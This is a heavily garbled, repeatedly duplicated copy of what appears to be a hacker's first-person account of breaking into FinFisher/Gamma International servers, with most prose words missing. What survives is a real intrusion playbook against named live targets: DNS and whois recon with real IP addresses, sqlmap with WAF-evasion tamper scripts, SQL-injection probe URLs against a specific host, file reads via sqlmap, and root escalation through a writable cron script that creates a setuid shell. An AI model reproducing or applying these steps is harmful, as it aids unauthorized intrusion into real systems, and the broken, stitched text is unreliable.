, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
3. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

1. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
2. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
3. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

